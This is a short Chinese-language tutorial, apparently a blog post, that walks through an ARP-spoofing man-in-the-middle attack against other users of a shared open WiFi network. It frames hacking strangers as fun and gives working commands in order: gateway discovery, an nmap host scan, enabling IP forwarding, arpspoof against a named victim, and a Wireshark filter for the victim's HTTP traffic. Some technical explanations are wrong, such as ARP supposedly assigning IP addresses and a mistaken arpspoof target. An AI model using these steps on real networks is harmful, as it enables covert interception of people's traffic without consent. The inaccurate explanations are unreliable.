我们知道,如今,如果我们任何人都能找到免费的开放式WiFi,我们的幸福感将进一步提升。好吧,黑客入侵使用与我们使用的相同开放式WiFi的人听起来不是很酷吗?如果是的话,那么让我们找出一种使这种事情发生的方法。
我们将需要以下工具:
- Kali Linux或安装了必需工具的其他Linux: Kali Linux是高级渗透测试Linux发行版,用于渗透测试,道德黑客和网络安全评估。
- Nmap: Nmap是免费的开源网络扫描仪。它用于通过发送数据包并分析响应来发现网络上的主机和服务。
- arpspoof:ARP代表A ddress [R esolution P rotocol。每当我们将设备连接到WiFi网络时,ARP就会为我们分配一个唯一的IP地址,并将我们的设备MAC地址存储在ARP表中,而arpspoof只是在欺骗这些请求。
- Wireshark:这是一个开源的数据包分析器,用于网络分析和故障排除。
破解开放式WiFi的步骤
步骤1:连接到目标网络并在终端中运行以下命令:
ip route
上面的命令用于查找流量在其中流动的网关地址。
步骤2:下一步是使用nmap通过执行以下命令来查找连接到网络的其他主机:
nmap -sP -n "gateway address/ip range"
使用此命令,我们将找到所有连接到目标网络的主机及其IP地址和MAC地址。
步骤3:使用以下命令启用IP转发:
echo 1 > /proc/sys/net/ipv4/ip_forward
步骤4:要在我们的设备上获取受害者流量,我们将使用arpspoof命令。对于arpspoof命令,我们需要知道执行攻击的接口,为此,请运行以下命令:
ifconfig
现在运行以下命令:
arpspoof -i wlp3s0 -t "victim host ip address" -r "our ip address"
我们欺骗了受害者的设备,说他的路由器地址已更改为我们的IP地址,现在我们可以拦截所有流量了。
步骤5:最后,为了拦截受害者的流量,我们将使用Wireshark,而我们所要做的就是使用受害者的IP地址。假设我们只想拥有HTTP流量,我们可以使用以下查询:
http && ip.addr == "victim's ip address"